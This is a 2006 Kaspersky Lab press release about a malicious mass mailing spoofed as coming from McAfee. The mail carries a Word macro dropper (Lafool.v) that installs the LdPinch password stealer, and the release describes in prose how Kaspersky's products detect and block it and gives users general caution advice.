Kaspersky Lab, Inc.

Malicious Mass Mailing Allegedly from McAfee. New Variants of Malicious Programs Circulating


Moscow, Russia -- (ReleaseWire) -- 11/03/2006 --Kaspersky Lab has intercepted a mass-mailing containing Trojan-Dropper.MSWord.Lafool.v. This mass mailing is unusual as messages appeared to be sent from mcafee@europe.com and allegedly originated from McAfee, an antivirus company.

Lafool.v is a Word document called "McAfee Inc. Reports.doc". The file is 80,635 bytes in size, and allegedly contains a report about the propagation of malicious programs on the Internet.

The document contains a macro written in Visual Basic for Applications. Lafool.v extracts a new modification of LdPinch, a well known Trojan password stealing program, from itself, and launches it for execution. LdPinch steals passwords to a number of services and applications, including AOL Instant Messenger and ICQ, and other confidential user data. Kaspersky Anti-Virus detects the new variant of this program as Trojan-PSW.Win32.LdPinch.bbg.

The Kaspersky Anti-Virus 6.0 and Kaspersky Internet Security Proactive Defense module will block the Trojan, including its attempts to:

1. execute a suspicious macro command
2. harvest personal data
3. start the Internet browser with command line parameters
4. send harvested data via the browser without the user's knowledge

The Trojan's activity is blocked if the user blocks at least one of these actions (LdPinch will either fail to start or will be unable to carry out its malicious payload. It should be noted that this technology for sending data without the user's knowledge was first implemented in the well-publicized PC Flank Leaktest (http://www.pcflank.com/pcflankleaktest.htm).

Kaspersky Lab believes that McAfee is in no way involved in the distribution of this Trojan and that the email address used in the messages (mcafee@europe.com) is fake and used in order to cause recipients to open infected messages.

An antivirus database update containing detection for Lafool.v was released on October 31st, 2006. Users of Kaspersky Anti-Virus are recommended to update their antivirus databases.

Users are also advised to be careful and refrain from opening messages from unknown senders and with suspicious attachments.

Additional information is available here:

Kaspersky Lab Information Service
10/1 1st Volokolamsky Proezd, Moscow, 123060, Russia
Tel./Fax: +7 495 797 87 00
e-mail: timur.tsoriev@kaspersky.com
http://www.kaspersky.com; http://www.viruslist.com

Visit us online at www.kaspersky.com/press